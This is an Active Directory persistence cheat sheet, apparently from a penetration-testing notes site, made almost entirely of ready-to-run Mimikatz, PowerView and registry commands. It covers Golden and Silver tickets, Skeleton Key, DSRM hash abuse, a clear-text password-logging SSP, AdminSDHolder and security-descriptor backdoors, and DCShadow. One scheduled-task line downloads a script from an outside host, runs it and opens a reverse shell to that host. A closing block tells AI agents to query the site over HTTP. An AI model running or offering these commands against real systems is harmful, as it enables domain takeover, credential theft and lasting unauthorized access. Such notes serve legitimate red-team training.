# Persistance ## Golden Ticket ``` # Run as DA locally on DC to get krbtgt hash: Invoke-Mimikatz -Command '"lsadump::lsa /patch"' # Run Remotely as DA to get krbtgt hash: Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\krbtgt"' # Get Domain-SID: Get-DomainSID # Get Domain Ticket policy: (Get-DomainPolicy)."kerberos.policy" # Create ticket: Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:DOMAIN.local /sid:S-1-5-21-1874506631-3219952063-538504511 /krbtgt:HASH id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ticket:C:\AD\Tools\krbtgt_tkt.kirbi"' # Use ticket: Invoke-Mimikatz -Command '"kerberos::ptt C:\AD\Tools\krbtgt_tkt.kirbi"' # Access ls \\domain-dc\c$ Invoke-Mimikatz -Command '"lsadump::dcsync /user:DOMAIN\Administrator /domain:DOMAIN"' ``` ## Silver Ticket ``` # Using DC$ hash to provide access to domain shares on DC: Invoke-Mimikatz -Command '"kerberos::golden /domain:DOMAIN /sid:S-1-5-211874506631-3219952063-538504511 /target:DC.DOMAIN.local /service:CIFS /rc4:HASH /user:Administrator /ptt"' # Create ticket for HOST (using DC$ hash) to allow us to schedule tasks on target: Invoke-Mimikatz -Command '"kerberos::golden /domain:DOMAIN.local /sid:S-1-5-21-1874506631-3219952063-538504511 /target:dc.DOMAIN.local /service:HOST /rc4:HASH /user:Administrator /ptt"' ## Schedule task with above silver ticket schtasks /create /S dc.DOMAIN.local /SC Weekly /RU "NT Authority\SYSTEM" /TN "User" /TR "powershell iex (iwr http://172.16.100.218/Invoke-PowerShellTcp.ps1 -UseBasicParsing);Invoke-PowerShellTcp -Reverse -IPAddress 172.16.100.218 -Port 443" schtasks /Run /S dc.DOMAIN.local /TN "User" # To execute wmi need HOST and RPCSS Invoke-Mimikatz -Command '"kerberos::golden /domain:DOMAIN.local /sid:S-1-5-21-1874506631-3219952063-538504511 /target:dc.DOMAIN.local /service:RPCSS /rc4:HASH /user:Administrator /ptt"' ``` ## Skeleton Key ``` # Creating skeleton key Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -ComputerName dc.DOMAIN.local # Using Skeleton Key (Password is "mimikatz") Enter-PSSession –Computername dc –credential DOMAIN\Administrator ``` ## DSRM (Directory Services Restore Mode) DSRM password is needed when setting up a DC and is the local administrator password. By making some reg changes, it is possible to use the DSRM hash in a PTH attack. Gives DA that is very unlikely to change. ``` # Dump DSRM passwords (requires DA): Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"' -Computername dc # Change Reg: New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD # Pass the DSRM hash: Invoke-Mimikatz -Command '"sekurlsa::pth /domain:dc /user:Administrator /ntlm:HASH /run:powershell.exe"' ``` ## Custom SSP A Security Support Provider (SSP) is a DLL which provides ways for an application to obtain an authenticated connection. Some SSP Packages by Microsoft are NTLM, Kerberos, Wdigest, CredSSP. Mimikatz provides a custom SSP - mimilib.dll. This SSP logs local logons, service account and machine account passwords in clear text on the target server. ``` Drop the mimilib.dll to system32 and add mimilib to HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages: $packages = Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\ -Name 'Security Packages'| select -ExpandProperty 'Security Packages' $packages += "mimilib" Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\ -Name 'Security Packages' -Value $packages Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\ -Name 'Security Packages' -Value $packages # Using mimikatz, inject into lsass (Not stable with Server 2016): Invoke-Mimikatz -Command '"misc::memssp"' # All log ons are now logged in clear too: C:\Windows\system32\kiwissp.log ``` ## ACL Abuse - AdminSDHolder Resides in the System container of a domain and used to control the permissions - using an ACL - for certain built-in privileged groups ( called Protected Groups). Propogates across AD every hour. {% tabs %} {% tab title="PowerView" %} ``` # Giving a user full rights over AdminSDHolder groups: Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName student1 -Rights All -Verbose # Giving user reset password rights: Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName student1 -Rights ResetPassword -Verbose # Giving user WriteMember privs: Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName student1 -Rights WriteMembers -Verbose # Check Domain Admins permission as normal user: Get-ObjectAcl -SamAccountName "Domain Admins" ResolveGUIDs | ?{$_.IdentityReference -match 'student1'} # Abuse FullControl (powerview_dev): Add-DomainGroupMember -Identity 'Domain Admins' -Members testda -Verbose # Abusing ResetPassword (powerview_dev): Set-DomainUserPassword -Identity testda -AccountPassword (ConvertTo-SecureString "Password@123" -AsPlainText Force) -Verbose # Add DCSYNC rights to a user: Add-ObjectAcl -TargetDistinguishedName 'DC=DOMAIN,DC=local' -PrincipalSamAccountName student1 -Rights DCSync -Verbose ``` {% endtab %} {% tab title="ADModule" %} ``` # Giving a user full rights over AdminSDHolder groups: Set-ADACL -DistinguishedName 'CN=AdminSDHolder,CN=System,DC=dollarcorp,DC=moneycorp,D C=local' -Principal student1 -Verbose # Check Domain Admins permission as normal user: (Get-Acl -Path 'AD:\CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local').Access | ?{$_.IdentityReference -match 'student1'} # Abuse FullControl: Add-ADGroupMember -Identity 'Domain Admins' -Members testda # Abusing ResetPassword: Set-ADAccountPassword -Identity testda -NewPassword (ConvertTo-SecureString "Password@123" -AsPlainText Force) -Verbose # Add DCSYNC rights: Set-ADACL -DistinguishedName 'DC=dollarcorp,DC=moneycorp,DC=local' -Principal student1 -GUIDRight DCSync -Verbose ``` {% endtab %} {% endtabs %} ``` # Run SDProp manually using Invoke-SDPropagator.ps1: Invoke-SDPropagator -timeoutMinutes 1 -showProgress Verbose # For pre-Server 2008 machines: Invoke-SDPropagator -taskname FixUpInheritance timeoutMinutes 1 -showProgress -Verbose ``` ## ACL Abuse - Security Descriptors It is possible to modify Security Descriptors (security information like Owner, primary group, DACL and SACL) of multiple remote access methods (securable objects) to allow access to non-admin users. This is rarely checked. {% tabs %} {% tab title="WMI" %} ``` # On local machine for student1: Set-RemoteWMI -UserName student1 -Verbose # On remote machine for student1 without explicit credentials: Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc –namespace 'root\cimv2' -Verbose # On remote machine with explicit credentials. Only root\cimv2 and nested namespaces: Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc -Credential Administrator –namespace 'root\cimv2' -Verbose # On remote machine remove permissions: Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc–namespace 'root\cimv2' -Remove -Verbose ``` {% endtab %} {% tab title="PSRemote" %} ``` # On local machine for student1: Set-RemotePSRemoting -UserName student1 -Verbose # On remote machine for student1 without credentials: Set-RemotePSRemoting -UserName student1 -ComputerName dcorp-dc -Verbose # On remote machine, remove the permissions: Set-RemotePSRemoting -UserName student1 -ComputerName dcorp-dc -Remove ``` {% endtab %} {% tab title="Remote Registry" %} ``` # Using DAMP, with admin privs on remote machine: Add-RemoteRegBackdoor -ComputerName dcorp-dc -Trustee student1 -Verbose # As student1, retrieve machine account hash: Get-RemoteMachineAccountHash -ComputerName dcorp-dc -Verbose # Retrieve local account hash: Get-RemoteLocalAccountHash -ComputerName dcorp-dc -Verbose # Retrieve domain cached credentials: Get-RemoteCachedCredential -ComputerName dcorp-dc -Verbose ``` {% endtab %} {% endtabs %} ## DCShadow - Forest Persistance Machine needs to be part of the parent domain. Can be changed in the system properties with admin access. Requires user to be a valid user for that domain too, so may need to add them first. Will require comp restart. Requires 2 consoles. One as DA, one as SYSTEM. SYSTEM sets up the fake DC, DA pushes the replication. ``` # Setting up Fake DC .\mimikatz.exe mimikatz# !+ mimikatz# !processtoken mimikatz# lsadump::dcshadow /object:targetuser /attribute:serviceprincipalname /value:uniquespn/DC1 # On DA terminal mimikatz -command '"lsadump::dcshadow /push"' ``` Allowing DCShadow to a user so they can do it without DA privs for persistance. Once done the user can run the /push terminal without DA. First terminal still needs SYSTEM privs. ``` Set-DCShadowPermissions -FakeDC USER -SAMAccountName USER -Username studentx -Verbose ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://cheats.philkeeble.com/active-directory/ad-persistance.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.